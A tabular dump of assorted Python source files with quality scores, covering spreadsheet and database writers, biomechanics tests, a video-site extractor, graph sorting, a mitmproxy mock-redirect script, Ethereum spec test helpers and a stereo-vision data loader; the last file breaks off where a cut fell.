code (string, 2k-1.04M chars) | repo_path (string, 5-517 chars) | quality_prob (float64, 0.02-0.95) | learning_prob (float64, 0.02-0.93)
---|---|---|---
from enum import Enum
from typing import List
from typing import Any
from tempfile import NamedTemporaryFile
from openpyxl import Workbook
from openpyxl.styles import NamedStyle
from openpyxl.styles import PatternFill
from validator.loader import file_nt
from validator.engine.errors import TaskMessage
error_style = NamedStyle(name='error')
error_style.fill = PatternFill(start_color='00FF0000',
end_color='00FF0000',
fill_type='solid')
class TaskStatus(Enum):
IN_PROGRESS = 0
COMPLETED = 1
FAILED = 2
class ExcelWriter:
def __init__(self,
*,
headers: List[str],
stream: List[Any],
obj_key: file_nt,
duplicate_file: bool = False):
self.headers = headers
self.obj_key = obj_key
self.duplicated_file = duplicate_file
self.wb = Workbook()
self.ws = self.wb.active
self.ws.title = 'Data'
self.ws.append([
" ".join(field.split('_')).capitalize()
for field in self.headers
])
self.write_sheet(stream)
@property
def duplicated_file(self):
return self._duplicated
@duplicated_file.setter
def duplicated_file(self, value):
self._duplicated = value
if not value:
self.headers.append('error_details')
def write_sheet(self, stream):
for row_idx, item in enumerate(stream):
self.write_rows_excel(row_idx=row_idx + 2, data=item)
def write_rows_excel(self, *, row_idx, data: dict):
"""Write a row to the Worksheet
Args:
data (dict): specify row data
row_idx (int): specify row index
"""
col_idx = 1
temp = data.get('data')._asdict()
errors = data.pop('errors', None)
for name, value in temp.items():
cell = self.ws.cell(column=col_idx, row=row_idx, value=value)
if errors and name in errors:
cell.style = error_style
col_idx += 1
self.ws.cell(column=col_idx,
row=row_idx,
value=data.get('error_msg'))
def upload_to_s3(self, *, client, bucket_name):
if self.duplicated_file:
post_fix = 'duplicates'
else:
post_fix = 'errors'
obj_key = (f'output/{self.obj_key.task_id}'
f'/{self.obj_key.file.name}_{post_fix}.xlsx')
with NamedTemporaryFile() as tmp:
self.wb.save(tmp.name)
tmp.seek(0)
client.upload_fileobj(tmp,
bucket_name,
obj_key)
class DBWriter:
def __init__(self,
*,
task_id: str,
cursor):
self._cursor = cursor
self.task_id = task_id
    @property
    def task_id(self):
        return self._task_id
    @task_id.setter
    def task_id(self, value):
        """Create a task in DB and remember its id"""
        self._task_id = value
        query = 'INSERT INTO "public"."task" (task_id) VALUES (:task_id)'
        self._cursor.execute(query, {'task_id': int(value)})
def update_task(self,
*,
status: TaskStatus,
msg: TaskMessage = None,
details: str = None,
total: int = 0,
failed: int = 0,
duplicated: int = 0):
"""Update details of a task
Args:
status (str): specify task status
msg (TaskMessage): specify error message
details (str): specify details of error
total (int): specify total records
failed (int): specify total failed records
duplicated (int): specify total duplicated records
"""
query = (
'UPDATE "public"."task" SET '
'status = :status,'
'message = :msg,'
'details = :details,'
'total = :total,'
'failed = :failed,'
'duplicated = :duplicated '
'WHERE task_id = :task_id'
)
self._cursor.execute(
query,
{
'status': status,
'msg': msg,
'details': details,
'total': total,
'failed': failed,
'duplicated': duplicated,
'task_id': self.task_id
}
)
def write_users(self, *, headers, stream):
pass
|
validator/writer.py
| 0.722625 | 0.137012 |
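A minimal usage sketch for the ExcelWriter above, assuming the module is importable as validator.writer; the User/FileInfo/Key namedtuples stand in for the real stream items and for validator.loader.file_nt, and MagicMock stands in for a boto3 S3 client, so none of those names come from the original code.

from collections import namedtuple
from unittest.mock import MagicMock

from validator.writer import ExcelWriter

# Stand-ins: each stream item holds a namedtuple under 'data', plus optional 'errors'/'error_msg'.
User = namedtuple('User', ['name', 'email'])
FileInfo = namedtuple('FileInfo', ['name'])
Key = namedtuple('Key', ['task_id', 'file'])   # stand-in for validator.loader.file_nt

stream = [
    {'data': User('Ada', 'ada@example.com'), 'errors': ['email'], 'error_msg': 'invalid email'},
    {'data': User('Bob', 'bob@example.com'), 'error_msg': None},
]
writer = ExcelWriter(headers=['name', 'email'],
                     stream=stream,
                     obj_key=Key(task_id='42', file=FileInfo(name='users')),
                     duplicate_file=False)
# A real boto3 client would be passed here; MagicMock only exercises the call path.
writer.upload_to_s3(client=MagicMock(), bucket_name='my-bucket')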
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__author__ = "<NAME>"
__copyright__ = "Copyright (C) 2020 <NAME>"
__email__ = "<EMAIL>"
__license__ = "Apache 2.0"
"""
Unit tests for the inversedynamics module.
"""
import kineticstoolkit as ktk
import numpy as np
import warnings
def test_calculate_proximal_wrenches_2d_static():
"""
Test calculate_proximal_wrenches for a 2d static case
                   |  80 N
                   |                   y ^
                   |                     |
    m=3kg          V                     |
    o======1=======2m                    -----> x
This test uses this 2d figure on a 5 second-long simulated static trial
with automatic reconstruction of COMPosition, ComAcceleration,
SegmentAngles, AngularVelocity and AngularAcceleration.
"""
n_points = 100
ts = ktk.TimeSeries(time=np.linspace(0, 1, n_points))
ts.data['ProximalJointPosition'] = np.repeat(
np.array([[0, 0, 0, 1]]), n_points, axis=0)
ts.data['DistalJointPosition'] = np.repeat(
np.array([[2, 0, 0, 1]]), n_points, axis=0)
ts.data['ForceApplicationPosition'] = np.repeat(
np.array([[2, 0, 0, 1]]), n_points, axis=0)
ts.data['DistalForces'] = np.repeat(
np.array([[0, 80, 0, 0]]), n_points, axis=0)
ts.data['DistalMoments'] = np.repeat(
np.array([[0, 0, 0, 0]]), n_points, axis=0)
inertial_constants = {
'Mass': 3,
'COMProximalRatio': 0.5,
'GyrationCOMRatio': 0.1,
}
# Catch warnings because we use automatic com/angle/vel/acc calculation,
# which generate warnings.
with warnings.catch_warnings():
warnings.filterwarnings("ignore", category=UserWarning)
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.allclose(
np.nanmedian(prox.data['ProximalForces'], axis=0),
[0., 80 + 3. * 9.81, 0., 0.])
assert np.allclose(
np.nanmedian(prox.data['ProximalMoments'], axis=0),
[0., 0., 160 + 3. * 9.81, 0.])
def test_calculate_proximal_wrenches_2d_dynamic():
"""
Test various dynamic situations based on dummy kinematic values.
                   |  80 N
                   |                   y ^
                   |                     |
    m=3kg          V                     |
    o======1=======2m                    -----> x
These tests are only on one-point timeseries, with fake accelerations
and velocities. The aim is to test the wrench equations, not the
calculation of accelerations, velocities, etc.
"""
ts = ktk.TimeSeries(time=np.array([0]))
ts.data['ProximalJointPosition'] = np.array([[0, 0, 0, 1]])
ts.data['DistalJointPosition'] = np.array([[2, 0, 0, 1]])
ts.data['COMPosition'] = np.array([[1, 0, 0, 1]])
ts.data['ForceApplicationPosition'] = np.array([[2, 0, 0, 1]])
ts.data['DistalForces'] = np.array([[0, 80, 0, 0]])
ts.data['DistalMoments'] = np.array([[0, 0, 0, 0]])
inertial_constants = {
'Mass': 3,
'GyrationCOMRatio': 0.1,
}
# Test 1: Fully static
ts.data['COMAcceleration'] = np.array([[0, 0, 0, 0]])
ts.data['AngularVelocity'] = np.array([[0, 0, 0]])
ts.data['AngularAcceleration'] = np.array([[0, 0, 0]])
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.all(np.abs(prox.data['ProximalForces'][0] -
[0., 80 + 3. * 9.81, 0., 0.]) < 1E-10)
assert np.all(np.abs(prox.data['ProximalMoments'][0] -
[0., 0., 160 + 3. * 9.81, 0.]) < 1E-10)
# Test 2: The origin is fixed and the segment is not turning but has an
# angular acceleration of 1 rad/s2. This means the COM has an upward
# linear acceleration of 1 m/s2. We expect the y proximal force to have
# an additional (ma) component upward. For the moments, we expect an
# additional z proximal moment of (Ialpha) = I
# I = mk^2 + md^2 = 0.04 * 3 + 3 = 3.12
ts.data['COMAcceleration'] = np.array([[0, 1, 0, 0]])
ts.data['AngularVelocity'] = np.array([[0, 0, 0]])
ts.data['AngularAcceleration'] = np.array([[0, 0, 1]])
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.allclose(prox.data['ProximalForces'][0],
[0., (80 + 3. * 9.81) + 3, 0., 0.])
assert np.allclose(prox.data['ProximalMoments'][0],
[0., 0., (160 + 3. * 9.81) + 3.12, 0.])
# Test 3: Like test 2 but by swapping x and z (Fz <--> Fx, -Mx <--> Mz)
ts = ktk.TimeSeries(time=np.array([0]))
ts.data['ProximalJointPosition'] = np.array([[0, 0, 0, 1]])
ts.data['DistalJointPosition'] = np.array([[0, 0, 2, 1]])
ts.data['COMPosition'] = np.array([[0, 0, 1, 1]])
ts.data['ForceApplicationPosition'] = np.array([[0, 0, 2, 1]])
ts.data['DistalForces'] = np.array([[0, 80, 0, 0]])
ts.data['DistalMoments'] = np.array([[0, 0, 0, 0]])
inertial_constants = {
'Mass': 3,
'GyrationCOMRatio': 0.1,
}
ts.data['COMAcceleration'] = np.array([[0, 1, 0, 0]])
ts.data['AngularVelocity'] = np.array([[0, 0, 0]])
ts.data['AngularAcceleration'] = np.array([[-1, 0, 0]])
prox = ktk.inversedynamics.calculate_proximal_wrench(
ts, inertial_constants)
assert np.allclose(prox.data['ProximalForces'][0],
[0., (80 + 3. * 9.81) + 3, 0., 0.])
assert np.allclose(prox.data['ProximalMoments'][0],
[-((160 + 3. * 9.81) + 3.12), 0., 0., 0.])
if __name__ == "__main__":
import pytest
pytest.main([__file__])
|
tests/test_inversedynamics.py
| 0.889643 | 0.620765 |
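The expected values in these assertions can be restated with plain arithmetic: the proximal force is the 80 N distal force plus the segment weight, the proximal moment is those two loads times their moment arms about the proximal joint (2 m and 1 m), and the test-2 inertia follows the I = m*k^2 + m*d^2 comment. A standalone numpy check of just those numbers, independent of kineticstoolkit:

import numpy as np

mass, g = 3.0, 9.81
distal_force_y = 80.0

expected_force_y = distal_force_y + mass * g                # 109.43 N
expected_moment_z = 2.0 * distal_force_y + 1.0 * mass * g   # 189.43 N*m
inertia = mass * (0.1 * 2.0) ** 2 + mass * 1.0 ** 2         # 3.12 kg*m^2 (k = 0.1 * 2 m, d = 1 m)

assert np.isclose(expected_force_y, 80 + 3. * 9.81)
assert np.isclose(expected_moment_z, 160 + 3. * 9.81)
assert np.isclose(inertia, 3.12)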
from __future__ import unicode_literals
import re
import json
from .common import InfoExtractor
from ..compat import (
compat_urllib_request,
)
from ..utils import (
ExtractorError,
)
class IviIE(InfoExtractor):
IE_DESC = 'ivi.ru'
IE_NAME = 'ivi'
_VALID_URL = r'https?://(?:www\.)?ivi\.ru/(?:watch/(?:[^/]+/)?|video/player\?.*?videoId=)(?P<id>\d+)'
_TESTS = [
# Single movie
{
'url': 'http://www.ivi.ru/watch/53141',
'md5': '6ff5be2254e796ed346251d117196cf4',
'info_dict': {
'id': '53141',
'ext': 'mp4',
'title': '<NAME> меняет профессию',
'description': 'md5:b924063ea1677c8fe343d8a72ac2195f',
'duration': 5498,
'thumbnail': 'http://thumbs.ivi.ru/f20.vcp.digitalaccess.ru/contents/d/1/c3c885163a082c29bceeb7b5a267a6.jpg',
},
'skip': 'Only works from Russia',
},
        # A series episode
{
'url': 'http://www.ivi.ru/watch/dvoe_iz_lartsa/9549',
'md5': '221f56b35e3ed815fde2df71032f4b3e',
'info_dict': {
'id': '9549',
'ext': 'mp4',
'title': 'Двое из ларца - Серия 1',
'duration': 2655,
'thumbnail': 'http://thumbs.ivi.ru/f15.vcp.digitalaccess.ru/contents/8/4/0068dc0677041f3336b7c2baad8fc0.jpg',
},
'skip': 'Only works from Russia',
}
]
# Sorted by quality
_known_formats = ['MP4-low-mobile', 'MP4-mobile', 'FLV-lo', 'MP4-lo', 'FLV-hi', 'MP4-hi', 'MP4-SHQ']
# Sorted by size
_known_thumbnails = ['Thumb-120x90', 'Thumb-160', 'Thumb-640x480']
def _extract_description(self, html):
m = re.search(r'<meta name="description" content="(?P<description>[^"]+)"/>', html)
return m.group('description') if m is not None else None
def _extract_comment_count(self, html):
        m = re.search(r'(?s)<a href="#" id="view-comments" class="action-button dim gradient">\s*Комментарии:\s*(?P<commentcount>\d+)\s*</a>', html)
return int(m.group('commentcount')) if m is not None else 0
def _real_extract(self, url):
video_id = self._match_id(url)
api_url = 'http://api.digitalaccess.ru/api/json/'
data = {
'method': 'da.content.get',
'params': [
video_id, {
'site': 's183',
'referrer': 'http://www.ivi.ru/watch/%s' % video_id,
'contentid': video_id
}
]
}
request = compat_urllib_request.Request(api_url, json.dumps(data))
video_json_page = self._download_webpage(
request, video_id, 'Downloading video JSON')
video_json = json.loads(video_json_page)
if 'error' in video_json:
error = video_json['error']
if error['origin'] == 'NoRedisValidData':
raise ExtractorError('Video %s does not exist' % video_id, expected=True)
raise ExtractorError(
'Unable to download video %s: %s' % (video_id, error['message']),
expected=True)
result = video_json['result']
formats = [{
'url': x['url'],
'format_id': x['content_format'],
'preference': self._known_formats.index(x['content_format']),
} for x in result['files'] if x['content_format'] in self._known_formats]
self._sort_formats(formats)
if not formats:
raise ExtractorError('No media links available for %s' % video_id)
duration = result['duration']
compilation = result['compilation']
title = result['title']
title = '%s - %s' % (compilation, title) if compilation is not None else title
previews = result['preview']
previews.sort(key=lambda fmt: self._known_thumbnails.index(fmt['content_format']))
thumbnail = previews[-1]['url'] if len(previews) > 0 else None
video_page = self._download_webpage(url, video_id, 'Downloading video page')
description = self._extract_description(video_page)
comment_count = self._extract_comment_count(video_page)
return {
'id': video_id,
'title': title,
'thumbnail': thumbnail,
'description': description,
'duration': duration,
'comment_count': comment_count,
'formats': formats,
}
class IviCompilationIE(InfoExtractor):
IE_DESC = 'ivi.ru compilations'
IE_NAME = 'ivi:compilation'
_VALID_URL = r'https?://(?:www\.)?ivi\.ru/watch/(?!\d+)(?P<compilationid>[a-z\d_-]+)(?:/season(?P<seasonid>\d+))?$'
_TESTS = [{
'url': 'http://www.ivi.ru/watch/dvoe_iz_lartsa',
'info_dict': {
'id': 'dvoe_iz_lartsa',
'title': 'Двое из ларца (2006 - 2008)',
},
'playlist_mincount': 24,
}, {
'url': 'http://www.ivi.ru/watch/dvoe_iz_lartsa/season1',
'info_dict': {
'id': 'dvoe_iz_lartsa/season1',
'title': 'Двое из ларца (2006 - 2008) 1 сезон',
},
'playlist_mincount': 12,
}]
def _extract_entries(self, html, compilation_id):
return [self.url_result('http://www.ivi.ru/watch/%s/%s' % (compilation_id, serie), 'Ivi')
for serie in re.findall(r'<strong><a href="/watch/%s/(\d+)">(?:[^<]+)</a></strong>' % compilation_id, html)]
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
compilation_id = mobj.group('compilationid')
season_id = mobj.group('seasonid')
if season_id is not None: # Season link
season_page = self._download_webpage(url, compilation_id, 'Downloading season %s web page' % season_id)
playlist_id = '%s/season%s' % (compilation_id, season_id)
playlist_title = self._html_search_meta('title', season_page, 'title')
entries = self._extract_entries(season_page, compilation_id)
else: # Compilation link
compilation_page = self._download_webpage(url, compilation_id, 'Downloading compilation web page')
playlist_id = compilation_id
playlist_title = self._html_search_meta('title', compilation_page, 'title')
seasons = re.findall(r'<a href="/watch/%s/season(\d+)">[^<]+</a>' % compilation_id, compilation_page)
if len(seasons) == 0: # No seasons in this compilation
entries = self._extract_entries(compilation_page, compilation_id)
else:
entries = []
for season_id in seasons:
season_page = self._download_webpage(
'http://www.ivi.ru/watch/%s/season%s' % (compilation_id, season_id),
compilation_id, 'Downloading season %s web page' % season_id)
entries.extend(self._extract_entries(season_page, compilation_id))
return self.playlist_result(entries, playlist_id, playlist_title)
|
youtube_dl/extractor/ivi.py
| 0.481941 | 0.129293 |
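A quick standalone check of the _VALID_URL pattern against the two test URLs above, showing which group becomes the video id; the pattern string is copied from the extractor and nothing from youtube_dl is imported.

import re

VALID_URL = r'https?://(?:www\.)?ivi\.ru/(?:watch/(?:[^/]+/)?|video/player\?.*?videoId=)(?P<id>\d+)'

for url in ('http://www.ivi.ru/watch/53141',
            'http://www.ivi.ru/watch/dvoe_iz_lartsa/9549'):
    match = re.match(VALID_URL, url)
    print(url, '->', match.group('id'))   # 53141, then 9549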
from core.skills import skillsLoader
from core.utils.cleanOrder import *
def executeSkill(orderJson):  # Handle one (possibly compound) order
    order = orderJson["msg"]
    if order == "":
        return "Je ne vous ai pas entendu"
    orders = order.split(",")  # Check whether the order can be split (i.e. it contains a comma)
    returns = []
    if len(orders) > 1:  # Compound order
        for order in orders:
            if not toIgnore(order):
                newOrderJson = orderJson
                newOrderJson["msg"] = order.strip()
                returns.append(computeOrder(newOrderJson) + "\n")  # Only answer the relevant sub-orders
finalreturn = ""
for a in returns:
finalreturn += a
return finalreturn
else:
return computeOrder(orderJson)
def computeOrder(orderJson):  # Handle a single (already split) order
    for skill in skillsLoader.SkillsList:
        if skill.ask(orderJson["msg"]):  # If the requested sentence is already known
            return skill.execute(orderJson)
    scores = []  # Otherwise, compute similarity scores against every skill
for skill in skillsLoader.SkillsList:
scores.append(skill.similitude(orderJson["msg"]))
maxSimilitude = max(scores)
maxSimilitudeIndex = scores.index(maxSimilitude)
secScores = []
secScores += scores
secScores[maxSimilitudeIndex] = 0
secMaxSimilitude = max(secScores)
secMaxSimilitudeIndex = scores.index(secMaxSimilitude)
print(scores) # Debug
if (secMaxSimilitude == maxSimilitude):
print("2 phrases de meme similarite !")
return "Je ne comprends pas cette phrase."
    if (maxSimilitude == 0):  # No common word anywhere
print("Pas de mot commun !")
return "Je ne comprends pas cette phrase."
if maxSimilitude > 3 * secMaxSimilitude:
if (maxSimilitude >= 10):
return (skillsLoader.SkillsList[maxSimilitudeIndex].execute(orderJson))
return ("Je ne comprends pas cette phrase")
|
core/core.py
| 0.39257 | 0.32029 |
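A standalone sketch of the decision rule in computeOrder, using dummy score lists instead of real skills: the best similarity must be strictly more than three times the runner-up and at least 10, while ties and an all-zero score list are rejected.

def pick_skill(scores):
    best = max(scores)
    best_idx = scores.index(best)
    runner_up = max(s for i, s in enumerate(scores) if i != best_idx)
    if best == 0 or best == runner_up:
        return None                        # no common word, or an ambiguous tie
    if best > 3 * runner_up and best >= 10:
        return best_idx                    # this skill would be executed
    return None                            # too close to the runner-up, or too weak overall

print(pick_skill([12, 3, 0]))   # 0
print(pick_skill([12, 5, 0]))   # None: 12 is not more than 3 * 5
print(pick_skill([9, 2, 0]))    # None: below the minimum score of 10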
"""Algorithms for topological sorting"""
import queue
from typing import List
from .searching import dfs_recursive
from .searching_strategy import DFSStrategy
from ..directed_graph import DirectedGraph
from ..graph import Vertex
class DirectedCyclicGraphError(ValueError):
pass
def sort_topological_using_inputs(graph: DirectedGraph) -> List[Vertex]:
"""Topological sorting algorithm using predecessors counting.
:param graph: a directed graph
:return: topological order of vertices
:raise ValueError: if given graph contains a cycle"""
if graph.edges_count == 0:
return list(graph.vertices)
vertex_queue = queue.PriorityQueue()
input_degrees = {v: graph.input_degree(v) for v in graph.vertices}
order = []
for vertex in graph.vertices:
if input_degrees[vertex] == 0:
vertex_queue.put(vertex)
while not vertex_queue.empty():
vertex = vertex_queue.get()
order.append(vertex)
del input_degrees[vertex]
for neighbour in graph.neighbours(vertex):
input_degrees[neighbour] -= 1
if input_degrees[neighbour] == 0:
vertex_queue.put(neighbour)
if len(order) != graph.vertices_count:
raise DirectedCyclicGraphError("Given graph contains a cycle")
return order
def sort_topological_using_dfs(graph: DirectedGraph) -> List[Vertex]:
"""Topological sorting algorithm using DFS.
:param graph: a directed graph
:return: topological order of vertices
:raise ValueError: if given graph contains a cycle"""
if graph.edges_count == 0:
return list(graph.vertices)
strategy = _TopologicalStrategy()
dfs_recursive(graph, strategy, graph.vertices)
return list(reversed(strategy.order))
class _TopologicalStrategy(DFSStrategy):
def __init__(self):
self.order = []
def for_root(self, root):
pass
def on_entry(self, vertex):
pass
def on_next_vertex(self, vertex, neighbour):
pass
def on_exit(self, vertex):
self.order.append(vertex)
def on_edge_to_visited(self, vertex, neighbour):
raise DirectedCyclicGraphError("The graph contains a cycle")
|
algolib/graphs/algorithms/topological_sorting.py
| 0.927157 | 0.674767 |
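The functions above work on algolib's DirectedGraph/Vertex types; as a self-contained illustration of the same predecessor-counting idea (Kahn's algorithm), here is a sketch over a plain adjacency dict that does not depend on the library.

import queue

def kahn_topological_sort(successors):
    """successors maps each vertex to an iterable of its direct successors."""
    in_degree = {v: 0 for v in successors}
    for targets in successors.values():
        for t in targets:
            in_degree[t] += 1
    ready = queue.PriorityQueue()
    for v, deg in in_degree.items():
        if deg == 0:
            ready.put(v)
    order = []
    while not ready.empty():
        v = ready.get()
        order.append(v)
        for t in successors[v]:
            in_degree[t] -= 1
            if in_degree[t] == 0:
                ready.put(t)
    if len(order) != len(successors):
        raise ValueError("graph contains a cycle")
    return order

print(kahn_topological_sort({0: [1, 2], 1: [3], 2: [3], 3: []}))  # [0, 1, 2, 3]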
from urllib.parse import urlparse
from mitmproxy import http
from lyrebird import log
import os
import json
import logging
import re
_logger = log.get_logger()
_logger.setLevel(logging.INFO)
PROXY_PORT = int(os.environ.get('PROXY_PORT'))
PROXY_FILTERS = json.loads(os.environ.get('PROXY_FILTERS'))
def to_mock_server(flow: http.HTTPFlow):
raw_url = urlparse(flow.request.url)
raw_host = raw_url.hostname
if raw_url.port:
raw_host += f':{raw_url.port}'
    # The mock path is the original url prefixed with /mock
    flow.request.path = '/mock/' + flow.request.url
    # The mock scheme is always http
flow.request.scheme = 'http'
# mock server port
flow.request.port = PROXY_PORT
# mock server ip
flow.request.host = '127.0.0.1'
# device real ip
address = flow.client_conn.address[0]
    # The address may be an IPv4-mapped IPv6 address; extract the plain IPv4 part
if address.startswith('::ffff:'):
address = address.split('::ffff:')[1]
flow.request.headers['Lyrebird-Client-Address'] = address
flow.request.headers['Mitmproxy-Proxy'] = address
flow.request.headers['Proxy-Raw-Headers'] = json.dumps({name: flow.request.headers[name] for name in flow.request.headers}, ensure_ascii=False)
_logger.info('Redirect-> %s' % flow.request.url[:100])
def request(flow: http.HTTPFlow):
_logger.info(flow.request.url[:100])
if 'mitm.it' in flow.request.url:
# Support mitm.it
return
if not PROXY_FILTERS:
to_mock_server(flow)
return
for _filter in PROXY_FILTERS:
if re.search(_filter, flow.request.url):
to_mock_server(flow)
break
def responseheaders(flow):
"""
Enables streaming for all responses.
This is equivalent to passing `--set stream_large_bodies=1` to mitmproxy.
"""
if 'mitm.it' in flow.request.url:
# Support mitm.it
flow.response.stream = False
return
flow.response.stream = True
command = flow.response.headers.get('Lyrebird-Mitmproxy-Command')
if command == 'kill':
flow.kill()
|
lyrebird/proxy/mitm_script.py
| 0.36977 | 0.075176 |
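The script expects PROXY_PORT and PROXY_FILTERS in the environment before mitmproxy loads it (e.g. via mitmdump -s). The sketch below only exercises the filter decision from request() on plain URL strings; the filter patterns and URLs are made-up examples.

import json
import re

# PROXY_FILTERS arrives as a JSON-encoded list of regexes, as in os.environ above.
proxy_filters = json.loads('["api[.]example[.]com", "/v1/orders"]')

def should_redirect(url, filters):
    # Mirrors request(): with no filters every request goes to the mock server,
    # otherwise only URLs matching at least one pattern are redirected.
    if not filters:
        return True
    return any(re.search(pattern, url) for pattern in filters)

print(should_redirect('https://api.example.com/v1/orders', proxy_filters))    # True
print(should_redirect('https://static.example.com/logo.png', proxy_filters))  # False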
def for_ops(state, operations, fn) -> None:
for operation in operations:
fn(state, operation)
def get_process_calls(spec):
return {
# PHASE0
'process_block_header':
lambda state, block: spec.process_block_header(state, block),
'process_randao':
lambda state, block: spec.process_randao(state, block.body),
'process_eth1_data':
lambda state, block: spec.process_eth1_data(state, block.body),
'process_proposer_slashing':
lambda state, block: for_ops(state, block.body.proposer_slashings, spec.process_proposer_slashing),
'process_attester_slashing':
lambda state, block: for_ops(state, block.body.attester_slashings, spec.process_attester_slashing),
'process_shard_header':
lambda state, block: for_ops(state, block.body.shard_headers, spec.process_shard_header),
'process_attestation':
lambda state, block: for_ops(state, block.body.attestations, spec.process_attestation),
'process_deposit':
lambda state, block: for_ops(state, block.body.deposits, spec.process_deposit),
'process_voluntary_exit':
lambda state, block: for_ops(state, block.body.voluntary_exits, spec.process_voluntary_exit),
# Altair
'process_sync_aggregate':
lambda state, block: spec.process_sync_aggregate(state, block.body.sync_aggregate),
# Merge
'process_application_payload':
lambda state, block: spec.process_application_payload(state, block.body),
# TODO: add sharding processing functions when spec stabilizes.
# Custody Game
'process_custody_game_operations':
lambda state, block: spec.process_custody_game_operations(state, block.body),
}
def run_block_processing_to(spec, state, block, process_name: str):
"""
Processes to the block transition, up to, but not including, the sub-transition named ``process_name``.
Returns a Callable[[state, block], None] for the remaining ``process_name`` transition.
Tests should create full blocks to ensure a valid state transition, even if the operation itself is isolated.
(e.g. latest_header in the beacon state is up-to-date in a sync-committee test).
A test prepares a pre-state by calling this function, output the pre-state,
and it can then proceed to run the returned callable, and output a post-state.
"""
print(f"state.slot {state.slot} block.slot {block.slot}")
# transition state to slot before block state transition
if state.slot < block.slot:
spec.process_slots(state, block.slot)
print(f"state.slot {state.slot} block.slot {block.slot} A")
# process components of block transition
for name, call in get_process_calls(spec).items():
if name == process_name:
return call
# only run when present. Later phases introduce more to the block-processing.
if hasattr(spec, name):
call(state, block)
|
tests/core/pyspec/eth2spec/test/helpers/block_processing.py
| 0.447702 | 0.353735 |
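A sketch of the calling pattern the docstring describes, written as a helper that takes the usual eth2spec test fixtures (spec, state, block) from the caller; 'process_attestation' is just one of the keys defined in get_process_calls, and state.copy() is assumed to be the usual SSZ-container copy used in these tests.

def run_attestation_sub_transition(spec, state, block):
    # Advance the state through every sub-transition that precedes process_attestation...
    call = run_block_processing_to(spec, state, block, 'process_attestation')
    pre_state = state.copy()   # snapshot of the prepared pre-state
    # ...then run the isolated sub-transition on the same state.
    call(state, block)
    return pre_state, state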
import os
import random
import pandas as pd
import numpy as np
import torch
import torch.utils.data as data
from PIL import Image
import scipy.misc as ssc
from psmnet.dataloader import preprocess
IMG_EXTENSIONS = [
'.jpg', '.JPG', '.jpeg', '.JPEG',
'.png', '.PNG', '.ppm', '.PPM', '.bmp', '.BMP',
]
calib = [[725.0087, 0, 620.5], [0, 725.0087, 187], [0, 0, 1]]
def is_image_file(filename):
return any(filename.endswith(extension) for extension in IMG_EXTENSIONS)
def dataloader(root_dir, split):
"""
    Function to load data for Virtual KITTI
    :param root_dir: dataset directory
    :param split: dataset split ("train" or anything else for the validation scenes)
:return: left, right and disparity file lists
"""
if split == "train":
scenes = ["Scene01", "Scene02", "Scene06", "Scene18"]
else:
scenes = ["Scene20"]
sub_scenes = ["15-deg-left", "30-deg-left", "15-deg-right", "30-deg-right",
"clone", "morning", "rain", "fog", "overcast", "sunset"]
left = []
right = []
disp = []
for scene in scenes:
dir = os.path.join(root_dir, scene)
for sub in sub_scenes:
sub_dir = os.path.join(dir, sub, "frames")
path, dirs, files = os.walk(os.path.join(sub_dir, "rgb", "Camera_0")).__next__()
num_files = len(files)
for i in range(num_files):
file = "{:05d}".format(i)
left.append(os.path.join(sub_dir, "rgb", "Camera_0",
"rgb_{}.jpg".format(file)))
right.append(os.path.join(sub_dir, "rgb", "Camera_1",
"rgb_{}.jpg".format(file)))
disp.append(os.path.join(sub_dir, "depth", "Camera_0",
"depth_{}.png".format(file)))
return left, right, disp
def default_loader(path):
return Image.open(path).convert('RGB')
def disparity_loader(path):
depth = np.array(Image.open(path)).astype(np.float64) / 100.0 # convert to meters
baseline = 0.54
disparity = (1.5 * baseline * calib[0][0]) / (depth + 1e-6) # enhance disparity for better training
return disparity
class ImageLoader(data.Dataset):
def __init__(self, left, right, left_disparity, training,
loader=default_loader, dploader=disparity_loader):
self.left = left
self.right = right
self.disp_L = left_disparity
self.loader = loader
self.dploader = dploader
self.training = training
def __getitem__(self, index):
left = self.left[index]
right = self.right[index]
disp_L = self.disp_L[index]
left_img = self.loader(left)
right_img = self.loader(right)
dataL = self.dploader(disp_L)
if self.training:
w, h = left_img.size
th, tw = 256, 512
x1 = random.randint(0, w - tw)
y1 = random.randint(0, h - th)
left_img = left_img.crop((x1, y1, x1 + tw, y1 + th))
right_img = right_img.crop((x1, y1, x1 + tw, y1 + th))
dataL = dataL[y1:y1 + th, x1:x1 + tw]
processed = preprocess.get_transform(augment=False)
left_img = processed(left_img)
right_img = processed(right_img)
else:
w, h = left_img.size
left_img = left_img.crop((w - 1200, h - 352, w, h))
right_img = right_img.crop((w - 1200, h - 352, w, h))
w1, h1 = left_img.size
dataL = dataL[h - 352:h, w - 1200:w]
processed = preprocess.get_transform(augment=False)
left_img = processed(left_img)
right_img = processed(right_img)
dataL = torch.from_numpy(dataL).float()
return left_img, right_img, dataL
def __len__(self):
return len(self.left)
|
psmnet/dataloader/VKittiLoader.py
| 0.639173 | 0.331539 |
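A small standalone check of the depth-to-disparity conversion in disparity_loader, using the focal length from the calib matrix above (725.0087 px) and the 0.54 m baseline; the depth values are made up.

import numpy as np

focal = 725.0087           # calib[0][0]
baseline = 0.54            # metres
depth = np.array([[5.0, 10.0],
                  [20.0, 40.0]])                          # metres, dummy values
disparity = (1.5 * baseline * focal) / (depth + 1e-6)     # same 1.5 scaling as above
print(np.round(disparity, 2))   # roughly [[117.45  58.73] [ 29.36  14.68]]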
import logging
from openstack import connection, config
from . import AbstractDriver
from ..node import Node, NodeState
def create_connection_from_config(name=None):
""" Creates a new open stack connection """
occ = config.OpenStackConfig()
cloud = occ.get_one_cloud(name)
return connection.from_config(cloud_config=cloud)
def get_all_ips(server):
"""
Digs out all the IPs from the server.addresses field
of an open stack server.
"""
output = []
addresses = server.addresses
for addr_list in addresses.values():
for addr in addr_list:
for name, val in addr.items():
if name == "addr":
output.append(val)
return sorted(output)
# https://developer.openstack.org/sdks/python/openstacksdk/users/resources/compute/v2/server.html#openstack.compute.v2.server.Server
MAPPING_STATES_STATUS = {
